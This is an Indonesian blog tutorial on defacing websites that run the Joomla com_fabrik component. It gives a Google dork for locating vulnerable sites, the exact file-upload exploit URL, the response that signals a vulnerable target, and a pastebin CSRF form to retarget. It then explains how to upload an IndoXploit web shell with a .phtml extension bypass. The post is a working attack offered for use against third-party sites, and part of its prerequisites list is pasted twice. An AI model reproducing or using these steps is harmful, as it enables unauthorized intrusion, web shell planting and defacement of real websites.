Deface Metode Com_fabrik Upload Shell With CSRF
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode Com_fabrik Upload Shell With CSRF
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja
-Dork
-Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-CSRF Comot sini Senpai
1. Dorking dulu di google (Gunakan otak kalian agar dapat yg vuln)-Shel
Gunakan shel IndoXploit saja
-Dork
inurl:index.php?option=Com_FabrikKembangin aja agar dapat yg vuln
-Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-CSRF Comot sini Senpai
https://pastebin.com/raw/FqSRiu1R
2. Jika sudah masukkan exploit di atas seperti ini
site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Jika Vuln akan ada seperti ini
{"filepath":null,"uri":null}
3. Ambil CSRF di atas dan edit di bagian site. Ganti menjadi target kalian kemudian save dengan format html
4. Buka CSRF tadi menggunakan browser seperti google atau apalah
5. Upload shel kalian
Upload shel harus bypass menjadi phtml, di sini saya hanya mengupload script deface saja
6. Jika work akan ada seperti ini, tinggal kalian akses aja
7. TADAA
Mungkin itulah sedikit penjelasan mengenai "Deface Metode Com_fabrik Upload Shell With CSRF"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb